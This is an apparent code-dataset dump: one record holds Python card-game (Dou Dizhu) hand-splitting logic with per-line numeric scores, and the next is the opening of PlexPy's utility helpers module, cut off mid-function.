self.outBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #王炸\r\n", " resultCards = self.outWangBombCard(handCard)\r\n", " return resultCards\r\n", " \r\n", " def outBombCard(self, handCard):\r\n", " bombvct = CardVector('bomb')\r\n", " self.getBombCard(handCard, bombvct)\r\n", " if bombvct.len() > 0:\r\n", " return bombvct.getFirstVal()\r\n", " return []\r\n", "\r\n", " def outWangBombCard(self, handCard):\r\n", " wangvct = CardVector('wang')\r\n", " self.getWangBombCard(handCard, wangvct)\r\n", " if wangvct.len() == 2:\r\n", " return wangvct.getList()\r\n", " return []\r\n", "\r\n", " #以下是拆牌算法\r\n", " def splitCard(self, handCard):\r\n", " \"\"\"拆牌->CardVector\"\"\"\r\n", " vector = CardVector('all')\r\n", " vector.addChild(CardVector('wang'))\r\n", " vector.addChild(CardVector('bomb'))\r\n", " vector.addChild(CardVector('shun'))\r\n", " vector.addChild(CardVector('three'))\r\n", " vector.addChild(CardVector('two'))\r\n", " vector.addChild(CardVector('one'))\r\n", " lastCards = []\r\n", " if len(handCard) == 2:\r\n", " if handCard[0] == self.__CW1 and handCard[1] == self.__CW2:\r\n", " vector.get('wang').add(val, handCard[0])\r\n", " vector.get('wang').add(val, handCard[1])\r\n", "\r\n", " if len(handCard) > 1:\r\n", " lastCards = self.getUnrelatedCard(handCard, vector)\r\n", " #剩余关联牌\r\n", " lastCards = self.getBombCard(lastCards, vector.get('bomb'))\r\n", " #检查飞机\r\n", " lastCards = self.getFlyCard(lastCards, vector.get('three'))\r\n", " lastCards = self.getShunTwoCard(lastCards, vector.get('two'))\r\n", " lastCards = self.getShunCard(lastCards, vector.get('shun'))\r\n", " lastCards = self.getThreeCard(lastCards, vector.get('three'))\r\n", " lastCards = self.getTwoCard(lastCards, vector.get('two'))\r\n", " lastCards = self.checkSingleAsShun(lastCards, vector.get('shun'))\r\n", " else:\r\n", " lastCards = handCard\r\n", " lastCards = self.getSingleCard(lastCards, vector.get('one'))\r\n", " return vector\r\n", " \r\n", " def addVector(self, vector, val, list):\r\n", " \"\"\"增加到vector集合以wang,bomb,three,two,one分类->void\"\"\"\r\n", " l = len(list)\r\n", " if l > 0 and val >= self.__CW1:\r\n", " vector.get('wang').add(val, list[0])\r\n", " elif l == 4:\r\n", " vector.get('bomb').add(val, list)\r\n", " elif l == 3:\r\n", " vector.get('three').add(val, list)\r\n", " elif l == 2:\r\n", " vector.get('two').add(val, list)\r\n", " elif l == 1:\r\n", " vector.get('one').add(val, list[0])\r\n", " \r\n", " def getUnrelatedCard(self, handCard, vector):\r\n", " \"\"\"取出无关联的牌,返回剩余关联牌\\n@vector:是wang,bomb,shun等的集合->[]\"\"\"\r\n", " arr = []\r\n", " lastCards = []\r\n", " eqVal = 0\r\n", " count = len(handCard)\r\n", " if count < 2:\r\n", " return handCard\r\n", "\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " val = self.getCardSize(card)\r\n", " if i == 0:\r\n", " arr.append(card)\r\n", " continue\r\n", " precard = handCard[i-1]\r\n", " preval = self.getCardSize(precard)\r\n", "\r\n", " if val == preval:\r\n", " arr.append(card)\r\n", " else:\r\n", " #之间是否有联系\r\n", " if preval >= self.__C2 or ((eqVal==0 or eqVal != preval-1) and (val==self.__C2 or preval < val-1)):\r\n", " self.addVector(vector, preval, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", "\r\n", " arr=[]\r\n", " eqVal = preval\r\n", " arr.append(card)\r\n", " #结尾\r\n", " if i == count-1:\r\n", " if val >= self.__C2 or eqVal < val-1:\r\n", " if (val == self.__CW1 or (preval < self.__CW1 and val == self.__CW2)):\r\n", " #单张大小王\r\n", " vector.get('one').add(val, card)\r\n", " else:\r\n", " self.addVector(vector, val, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", " return lastCards\r\n", " \r\n", "\r\n", "\r\n", " #以下是取牌组逻辑\r\n", " def getShunCard(self, handCard, vector):\r\n", " \"\"\"取出顺子,返回剩余牌->[]\"\"\"\r\n", " lastCards = []\r\n", " count = len(handCard)\r\n", " if count < 2:\r\n", " return handCard\r\n", " arr = []\r\n", " arrignore = []\r\n", " arrlog = []\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " if i == 0:\r\n", " arr.append(card)\r\n", " arrlog.append(card)\r\n", " continue\r\n", " precard = handCard[i-1]\r\n", " preval = self.getCardSize(precard)\r\n", " val = self.getCardSize(card)\r\n", " if preval == val-1 and val < self.__C2:\r\n", " arr.append(card)\r\n", " arrlog.append(card)\r\n", " elif preval == val:\r\n", " arrignore.append(card)\r\n", " arrlog.append(card)\r\n", " else:\r\n", " if len(arr) >= 5:\r\n", " vector.add(self.getCardSize(arr[0]), arr)\r\n", " self.copyList(arrignore, lastCards)\r\n", " else:\r\n", " self.copyList(arrlog, lastCards)\r\n", " arr = []\r\n", " arr.append(card)\r\n", " arrlog = []\r\n", " arrlog.append(card)\r\n", " arrignore = []\r\n", "\r\n", " if i == count-1:\r\n", " if len(arr) >= 5:\r\n", " vector.add(self.getCardSize(arr[0]), arr)\r\n", " self.copyList(arrignore, lastCards)\r\n", " arrignore = []\r\n", " else:\r\n", " self.copyList(arrlog, lastCards)\r\n", " return lastCards\r\n", " \r\n", " def getMoreThanShunCard(self, cards, minval, mincount, maxcount=0):\r\n", " \"\"\"从顺子cards对象中获取顺子大于minval的牌->[]\\n@cards:手上的牌,\\n@minval:最小牌面,\\n@mincount:顺子个数,\\n@maxcount:0时固定匹配\"\"\"\r\n", " result = []\r\n", " length = len(result)\r\n", " for card in cards:\r\n", " val = self.getCardSize(card)\r\n", " if val > minval and val < self.__C2\\\r\n", " and ((maxcount==0 and length < mincount)\\\r\n", " or(maxcount > 0 and length < maxcount-1)):\r\n", " result.append(card)\r\n", " if (maxcount == 0 and len(result) == mincount)\\\r\n", " or(maxcount > 0 and len(result) >= mincount) :\r\n", " return result\r\n", " return []\r\n", " \r\n", " def getWangBombCard(self, handCard, vector):\r\n", " \"\"\"取出王炸牌至vector对象,返回剩余牌->[]\"\"\"\r\n", " arr = []\r\n", " temp = []\r\n", " count = len(handCard)\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " val = self.getCardSize(card)\r\n", " if val == self.__CW1 or val == self.__CW2:\r\n", " temp.append(card)\r\n", " else:\r\n", " arr.append(card)\r\n", " if len(temp) == 2:\r\n", " for card in temp:\r\n", " vector.add(self.getCardSize(card), card)\r\n", " else:\r\n", " self.copyList(temp, arr)\r\n", " return arr\r\n", " \r\n", " def getBombCard(self, handCard, vector):\r\n", " \"\"\"取出炸至vector对象,返回剩余牌->[]\"\"\"\r\n", " return self.getSameCard(handCard, 4, vector)\r\n", " \r\n", " def getFlyCard(self, handCard, vector):\r\n", " \"\"\"取出飞机至vector对象,返回剩余牌->[]\"\"\"\r\n", " if len(handCard) > 5:\r\n", " threevct = CardVector('')\r\n", " self.getThreeCard(handCard, threevct)\r\n", " if threevct.len() > 1:\r\n", " arr = self.getMoreThanCardVal(threevct, 0, 2, 20)\r\n", " self.getSameCard(arr, 3, vector)\r\n", " for card in arr:\r\n", " handCard.remove(card)\r\n", " return handCard;\r\n", "\r\n", " def getShunTwoCard(self, handCard, vector):\r\n", " \"\"\"取出大于3连对至vector对象,返回剩余牌->[]\"\"\"\r\n", " if len(handCard) > 6:\r\n", " twovct = CardVector('')\r\n", " self.getTwoCard(handCard, twovct)\r\n", " if twovct.len() > 3:\r\n", " arr = self.getMoreThanCardVal(twovct, 0, 4, 20)\r\n", " self.getSameCard(arr, 2, vector)\r\n", " for card in arr:\r\n", " handCard.remove(card)\r\n", " return handCard;\r\n", "\r\n", " def getThreeCard(self, handCard, vector):\r\n", " \"\"\"取出3条至vector对象,返回剩余牌->[]\"\"\"\r\n", " return self.getSameCard(handCard, 3, vector)\r\n", " \r\n", " def getTwoCard(self, handCard, vector, matchThree=False):\r\n", " \"\"\"取出对子至vector对象,返回剩余牌->[]\\n@matchThree:是否匹配三张\"\"\"\r\n", " lastCards = self.getSameCard(handCard, 2, vector)\r\n", " if matchThree:\r\n", " threevct = CardVector('')\r\n", " lastCards = self.getSameCard(handCard, 3, threevct)\r\n", " if threevct.len() > 0:\r\n", " keys = threevct.getKeys()\r\n", " for key in keys:\r\n", " val = threevct.get(key)\r\n", " arr = []\r\n", " self.copyList(val, arr, 0, 2)\r\n", " vector.add(key, arr)\r\n", " return lastCards\r\n", " \r\n", " def getMoreThanCardVal(self, vector, minval, mincount, maxcount=0):\r\n", " \"\"\"从vector对象取出大于minval的连续牌列表->[]\\n@vector:vector对象,\\n@minval:牌面值,\\n@mincount:匹配个数,\\n@maxcount:0时固定匹配\"\"\"\r\n", " arr = []\r\n", " resultCards = []\r\n", " keys = vector.getKeys()\r\n", " for i in range(0, len(keys)):\r\n", " key = keys[i]\r\n", " if i == 0 and key > minval and key < self.__C2:\r\n", " arr.append(key)\r\n", " elif key > minval:\r\n", " prekey = keys[i-1]\r\n", " if prekey == key-1 and key < self.__C2:\r\n", " arr.append(key)\r\n", " if maxcount==0 and len(arr) == mincount:\r\n", " break\r\n", " else:\r\n", " if len(arr) >= mincount:\r\n", " break\r\n", " else:\r\n", " arr = []\r\n", " arr.append(key)\r\n", " length = len(arr)\r\n", " if length >= mincount:\r\n", " for i in range(0, length):\r\n", " if (maxcount==0 and i == mincount) or (maxcount > 0 and i >= maxcount-1):\r\n", " break\r\n", " val = arr[i]\r\n", " self.copyList(vector.get(val), resultCards)\r\n", " return resultCards\r\n", "\r\n", " def checkSingleAsShun(self, handCard, vector):\r\n", " \"\"\"检查单牌是否可加到顺子中,返回剩余牌->[]\"\"\"\r\n", " shunvct = vector\r\n", " keys = shunvct.getKeys()\r\n", " if len(keys) == 0:\r\n", " return handCard;\r\n", " lastCards = []\r\n", " for card in handCard:\r\n", " suc = False\r\n", " for key in keys:\r\n", " items = shunvct.get(key)\r\n", " if len(items) == 0:\r\n", " continue\r\n", " min = self.getCardSize(items[0])\r\n", " max = self.getCardSize(items[len(items)-1])\r\n", " val = self.getCardSize(card)\r\n", " if val == min-1:\r\n", " items.insert(0, val)\r\n", " suc = True\r\n", " break\r\n", " elif val == max+1:\r\n", " items.append(val)\r\n", " suc = True\r\n", " break\r\n", " if not suc:\r\n", " lastCards.append(card)\r\n", " return lastCards\r\n", " \r\n", " def convertVerctor(self, handCard, vector):\r\n", " \"\"\"将牌转至vector对象->void\"\"\"\r\n", " for card in handCard:\r\n", " vector.add(self.getCardSize(card), card)\r\n", "\r\n", " def getSingleCard(self, handCard, vector):\r\n", " \"\"\"取出单牌至vector对象,返回剩余牌->[]\"\"\"\r\n", " return self.getSameCard(handCard, 1, vector)\r\n", " \r\n", " \r\n", " def getSameCard(self, handCard, num, vector):\r\n", " \"\"\"取相同的牌,返回剩余牌\\n@num:相同的个数->[]\"\"\"\r\n", " lastCards = []\r\n", " arr = []\r\n", " count = len(handCard)\r\n", " if count < 2:\r\n", " if count > 0 and num == 1:\r\n", " card = handCard[0]\r\n", " vector.add(self.getCardSize(card), card)\r\n", " return arr;\r\n", " else:\r\n", " return handCard\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " if i == 0:\r\n", " arr.append(card)\r\n", " continue\r\n", " precard = handCard[i-1]\r\n", " val = self.getCardSize(card)\r\n", " preval = self.getCardSize(precard)\r\n", " if val == preval:\r\n", " arr.append(card)\r\n", " else:\r\n", " if len(arr) == num:\r\n", " if num == 1:\r\n", " vector.add(preval, arr[0])\r\n", " else:\r\n", " vector.add(preval, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", " arr = []\r\n", " arr.append(card)\r\n", "\r\n", " if count-1 == i:\r\n", " if len(arr) == num:\r\n", " if num == 1:\r\n", " vector.add(val, arr[0])\r\n", " else:\r\n", " vector.add(val, arr)\r\n", " else:\r\n", " self.copyList(arr, lastCards)\r\n", " return lastCards\r\n", "\r\n", " def getCard(self, handCard, cardVal, vector):\r\n", " \"\"\"取出指定大小的牌至vector对象,返回剩余牌->[]\\n@cardId:搜索指定牌大小\"\"\"\r\n", " arr = []\r\n", " count = len(handCard)\r\n", " for i in range(0, count):\r\n", " card = handCard[i]\r\n", " val = self.getCardSize(card)\r\n", " if val == cardVal:\r\n", " vector.add(val, card)\r\n", " else:\r\n", " arr.append(card)\r\n", " return arr\r\n", " \r\n", " def getCardHandleTimes(self, handCard):\r\n", " \"\"\"计算出牌手数->int\"\"\"\r\n", " vector = self.splitCard(handCard)\r\n", " return self.getVectorHandleTimes(vector)\r\n", "\r\n", " def getVectorHandleTimes(self, vector):\r\n", " \"\"\"计算出牌手数->int\\n@vector:拆牌后的vector对象\"\"\"\r\n", " times = 0\r\n", " if vector.get('wang').len() > 0:\r\n", " times = times + 1\r\n", " bombLen = vector.get('bomb').len()\r\n", " if bombLen > 0:\r\n", " times = times + bombLen #四带2\r\n", " times = times + vector.get('shun').len()\r\n", " threeLen = vector.get('three').len()\r\n", " if threeLen > 0:\r\n", " times = times + threeLen\r\n", " twoLen = vector.get('two').len()\r\n", " if twoLen > 0:\r\n", " times = times + twoLen\r\n", " oneLen = vector.get('one').len()\r\n", " if oneLen > 0:\r\n", " times = times + oneLen\r\n", " times = times - threeLen * 1\r\n", " return times\r\n", "\r\n", " def getSingleCount(self, vector):\r\n", " \"\"\"计算单牌数->int\"\"\"\r\n", " return vector.get('one').len()\r\n", " \r\n", " def getTwoCount(self, vector):\r\n", " \"\"\"计算对牌数->int\"\"\"\r\n", " return vector.get('two').len()" ]
[ 0.041666666666666664, 0, 0.02127659574468085, 0, 0, 0, 0.022727272727272728, 0.023809523809523808, 0.02631578947368421, 0.02127659574468085, 0.022727272727272728, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0.16666666666666666, 0, 0.1297016861219196, 0.07722007722007722, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07407407407407407, 0, 0, 0.06060606060606061, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0.013333333333333334, 0.02127659574468085, 0.02127659574468085, 0, 0, 0, 0, 0.01639344262295082, 0.01639344262295082, 0.024096385542168676, 0, 0.025, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.06451612903225806, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.017857142857142856, 0, 0.02, 0.02, 0, 0, 0, 0, 0.009433962264150943, 0, 0, 0, 0, 0, 0, 0.0392156862745098, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0.031578947368421054, 0.02247191011235955, 0.037037037037037035, 0.03333333333333333, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.01834862385321101, 0.039603960396039604, 0.03333333333333333, 0, 0, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0.042105263157894736, 0.02631578947368421, 0, 0, 0.031496062992125984, 0.020833333333333332, 0, 0, 0, 0, 0, 0, 0, 0.01639344262295082, 0, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0.023809523809523808, 0.04, 0, 0, 0.03571428571428571, 0.012048192771084338, 0, 0.04, 0, 0, 0.04, 0.013888888888888888, 0.02857142857142857, 0, 0, 0, 0.022222222222222223, 0.04, 0, 0.014598540145985401, 0.03571428571428571, 0.012048192771084338, 0, 0.011904761904761904, 0.020202020202020204, 0.020618556701030927, 0.034482758620689655, 0, 0.04, 0, 0, 0.030303030303030304, 0.012048192771084338, 0.04, 0, 0, 0.013333333333333334, 0.03571428571428571, 0.012048192771084338, 0, 0.011904761904761904, 0.020202020202020204, 0.020618556701030927, 0.034482758620689655, 0, 0.04, 0, 0, 0, 0.16666666666666666, 0, 0.014705882352941176, 0.023809523809523808, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.02564102564102564, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0.02857142857142857, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0.058823529411764705, 0, 0, 0.047619047619047616, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0.010101010101010102, 0.01, 0.010101010101010102, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0.02631578947368421, 0.030303030303030304, 0, 0.02857142857142857, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0.06666666666666667, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014705882352941176, 0.05405405405405406, 0, 0.16666666666666666, 0, 0.009345794392523364, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0.011235955056179775, 0, 0, 0.02, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0.027522935779816515, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0.011764705882352941, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0.058823529411764705, 0, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0.05263157894736842, 0.024390243902439025, 0, 0, 0.03125, 0.013513513513513514, 0, 0, 0.027777777777777776, 0.01282051282051282, 0, 0, 0, 0, 0.03125, 0.013513513513513514, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0.017543859649122806, 0.015151515151515152, 0, 0, 0, 0, 0.03125, 0.020833333333333332, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0.02, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0.027522935779816515, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0.047619047619047616, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0.043478260869565216, 0, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0.02564102564102564, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0.058823529411764705, 0, 0, 0.010869565217391304, 0.03125, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0.13333333333333333, 0.021739130434782608, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.009174311926605505, 0, 0, 0, 0, 0, 0.034482758620689655, 0.05, 0, 0, 0.05, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0.008849557522123894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02197802197802198, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0.0196078431372549, 0.016129032258064516, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0.09090909090909091, 0.0196078431372549, 0, 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0.02631578947368421 ]
1,133
0.008726
false
# This file is part of PlexPy. # # PlexPy is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # PlexPy is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with PlexPy. If not, see <http://www.gnu.org/licenses/>. from operator import itemgetter from xml.dom import minidom import unicodedata import plexpy import datetime import fnmatch import shutil import time import sys import re import os import json import xmltodict import math def multikeysort(items, columns): comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns] def comparer(left, right): for fn, mult in comparers: result = cmp(fn(left), fn(right)) if result: return mult * result else: return 0 return sorted(items, cmp=comparer) def checked(variable): if variable: return 'Checked' else: return '' def radio(variable, pos): if variable == pos: return 'Checked' else: return '' def latinToAscii(unicrap): """ From couch potato """ xlate = { 0xc0: 'A', 0xc1: 'A', 0xc2: 'A', 0xc3: 'A', 0xc4: 'A', 0xc5: 'A', 0xc6: 'Ae', 0xc7: 'C', 0xc8: 'E', 0xc9: 'E', 0xca: 'E', 0xcb: 'E', 0x86: 'e', 0xcc: 'I', 0xcd: 'I', 0xce: 'I', 0xcf: 'I', 0xd0: 'Th', 0xd1: 'N', 0xd2: 'O', 0xd3: 'O', 0xd4: 'O', 0xd5: 'O', 0xd6: 'O', 0xd8: 'O', 0xd9: 'U', 0xda: 'U', 0xdb: 'U', 0xdc: 'U', 0xdd: 'Y', 0xde: 'th', 0xdf: 'ss', 0xe0: 'a', 0xe1: 'a', 0xe2: 'a', 0xe3: 'a', 0xe4: 'a', 0xe5: 'a', 0xe6: 'ae', 0xe7: 'c', 0xe8: 'e', 0xe9: 'e', 0xea: 'e', 0xeb: 'e', 0x0259: 'e', 0xec: 'i', 0xed: 'i', 0xee: 'i', 0xef: 'i', 0xf0: 'th', 0xf1: 'n', 0xf2: 'o', 0xf3: 'o', 0xf4: 'o', 0xf5: 'o', 0xf6: 'o', 0xf8: 'o', 0xf9: 'u', 0xfa: 'u', 0xfb: 'u', 0xfc: 'u', 0xfd: 'y', 0xfe: 'th', 0xff: 'y', 0xa1: '!', 0xa2: '{cent}', 0xa3: '{pound}', 0xa4: '{currency}', 0xa5: '{yen}', 0xa6: '|', 0xa7: '{section}', 0xa8: '{umlaut}', 0xa9: '{C}', 0xaa: '{^a}', 0xab: '&lt;&lt;', 0xac: '{not}', 0xad: '-', 0xae: '{R}', 0xaf: '_', 0xb0: '{degrees}', 0xb1: '{+/-}', 0xb2: '{^2}', 0xb3: '{^3}', 0xb4: "'", 0xb5: '{micro}', 0xb6: '{paragraph}', 0xb7: '*', 0xb8: '{cedilla}', 0xb9: '{^1}', 0xba: '{^o}', 0xbb: '&gt;&gt;', 0xbc: '{1/4}', 0xbd: '{1/2}', 0xbe: '{3/4}', 0xbf: '?', 0xd7: '*', 0xf7: '/' } r = '' if unicrap: for i in unicrap: if ord(i) in xlate: r += xlate[ord(i)] elif ord(i) >= 0x80: pass else: r += str(i) return r def convert_milliseconds(ms): seconds = ms / 1000 gmtime = time.gmtime(seconds) if seconds > 3600: minutes = time.strftime("%H:%M:%S", gmtime) else: minutes = time.strftime("%M:%S", gmtime) return minutes def convert_milliseconds_to_minutes(ms): if str(ms).isdigit(): seconds = float(ms) / 1000 minutes = round(seconds / 60, 0) return math.trunc(minutes) return 0 def convert_seconds(s): gmtime = time.gmtime(s) if s > 3600: minutes = time.strftime("%H:%M:%S", gmtime) else: minutes = time.strftime("%M:%S", gmtime) return minutes def today(): today = datetime.date.today() yyyymmdd = datetime.date.isoformat(today) return yyyymmdd def now(): now = datetime.datetime.now() return now.strftime("%Y-%m-%d %H:%M:%S") def human_duration(s, sig='dhms'): hd = '' if str(s).isdigit() and s > 0: d = int(s / 84600) h = int((s % 84600) / 3600) m = int(((s % 84600) % 3600) / 60) s = int(((s % 84600) % 3600) % 60) hd_list = [] if sig >= 'd' and d > 0: d = d + 1 if sig == 'd' and h >= 12 else d hd_list.append(str(d) + ' days') if sig >= 'dh' and h > 0: h = h + 1 if sig == 'dh' and m >= 30 else h hd_list.append(str(h) + ' hrs') if sig >= 'dhm' and m > 0: m = m + 1 if sig == 'dhm' and s >= 30 else m hd_list.append(str(m) + ' mins') if sig >= 'dhms' and s > 0: hd_list.append(str(s) + ' secs') hd = ' '.join(hd_list) else: hd = '0' return hd def get_age(date): try: split_date = date.split('-') except: return False try: days_old = int(split_date[0]) * 365 + int(split_date[1]) * 30 + int(split_date[2]) except IndexError: days_old = False return days_old def bytes_to_mb(bytes): mb = int(bytes) / 1048576 size = '%.1f MB' % mb return size def mb_to_bytes(mb_str): result = re.search('^(\d+(?:\.\d+)?)\s?(?:mb)?', mb_str, flags=re.I) if result: return int(float(result.group(1)) * 1048576) def piratesize(size): split = size.split(" ") factor = float(split[0]) unit = split[1].upper() if unit == 'MiB': size = factor * 1048576 elif unit == 'MB': size = factor * 1000000 elif unit == 'GiB': size = factor * 1073741824 elif unit == 'GB': size = factor * 1000000000 elif unit == 'KiB': size = factor * 1024 elif unit == 'KB': size = factor * 1000 elif unit == "B": size = factor else: size = 0 return size def replace_all(text, dic, normalize=False): if not text: return '' for i, j in dic.iteritems(): if normalize: try: if sys.platform == 'darwin': j = unicodedata.normalize('NFD', j) else: j = unicodedata.normalize('NFC', j) except TypeError: j = unicodedata.normalize('NFC', j.decode(plexpy.SYS_ENCODING, 'replace')) text = text.replace(i, j) return text def replace_illegal_chars(string, type="file"): if type == "file": string = re.sub('[\?"*:|<>/]', '_', string) if type == "folder": string = re.sub('[:\?<>"|]', '_', string) return string def cleanName(string): pass1 = latinToAscii(string).lower() out_string = re.sub('[\.\-\/\!\@\#\$\%\^\&\*\(\)\+\-\"\'\,\;\:\[\]\{\}\<\>\=\_]', '', pass1).encode('utf-8') return out_string def cleanTitle(title): title = re.sub('[\.\-\/\_]', ' ', title).lower() # Strip out extra whitespace title = ' '.join(title.split()) title = title.title() return title def split_path(f): """ Split a path into components, starting with the drive letter (if any). Given a path, os.path.join(*split_path(f)) should be path equal to f. """ components = [] drive, path = os.path.splitdrive(f) # Strip the folder from the path, iterate until nothing is left while True: path, folder = os.path.split(path) if folder: components.append(folder) else: if path: components.append(path) break # Append the drive (if any) if drive: components.append(drive) # Reverse components components.reverse() # Done return components def extract_logline(s): # Default log format pattern = re.compile(r'(?P<timestamp>.*?)\s\-\s(?P<level>.*?)\s*\:\:\s(?P<thread>.*?)\s\:\s(?P<message>.*)', re.VERBOSE) match = pattern.match(s) if match: timestamp = match.group("timestamp") level = match.group("level") thread 